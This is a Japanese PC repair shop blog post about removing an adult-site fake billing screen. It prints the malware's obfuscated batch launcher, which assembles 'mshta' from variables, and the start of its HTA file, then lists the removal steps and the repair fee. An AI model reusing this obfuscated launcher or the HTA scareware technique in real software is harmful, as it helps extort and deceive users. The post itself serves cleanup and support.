アダルトサイトの請求画面削除。
早速HijackThisでログを採取。
ProgramDateフォルダ内に067H94MYという名前のバッチファイルが埋め込まれています。
最近のはhtaファイルを使ったものが殆どですので珍しいです。
該当ファイルのプロパティを確認してみると
ファイルの作成日時が発症日時と一致していますので間違い無さそうです。
試しに067H94MYファイルをテキストで開いて確認してみました。
@ECHO OFF
SET b=s
REM
SET c=h
REM
SET d=t
REM
SET e=a
REM
SET a=m
start %a%%b%%c%%d%%e% "C:\ProgramData\lkgol\067H94MY.h"
C:\ProgramData\lkgol\067H94MY.hを実行するようにプログラムされています。
067H94MY.hファイルを確認してみると
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=shift-jis">
<meta name="robots" content="noindex,nofollow">
<meta name="googlebot" content="noindex,nofollow">
<script type="text/JavaScript">
b='window.'+'move'+'To';
eval(b +"(174256-175256,174256-175256)");
</script>
<HTA:APPLICATION
ID="idH"
BORDERSTYLE="none"
SCROLL="no"
CONTEXTMENU="no"
SHOWINTASKBAR="0" />
<title>ご利用確認完了のお知らせ画面</title>
途中までですがhtmlファイルで不正サイトにアクセスするようにスクリプトされています。
画像はサイトにアクセスして表示させているようです。
早速レジストリと該当ファイルをフォルダごと削除。
タスクでその他にスケジュールされていないか確認。
今回は問題ありませんでした。
そして再起動。
ネットに接続して様子を見ましたが表示される事はありません。
最後に再発しないように「システムの復元」の復元ポイントを削除。
以上で作業完了です。
この手のトラブルはお客様のご都合もありますので即日に発送させて頂きました。
当社では「アダルトサイトの請求画面」の削除は基本的にはその場で可能です。
お困りの方はご相談ください。
間違っても先方に支払ったり連絡など取らないようにお願いします。
アダルトサイトの請求画面削除 ¥8,000-
人気blogランキングに登録しました。クリックご協力ください。
パソコン修理・トラブルサポートはPCRサービスまで!!
宅配修理もお受け致します。PCRサービス宅配修理サービス。
お問合せはこちら
| 固定リンク
« NEC LL750/G ウィルス「Disk Antivirus Professional」の駆除。 | トップページ | NEC LL550/R 「Disk Antivirus Professional」の駆除。 »
コメント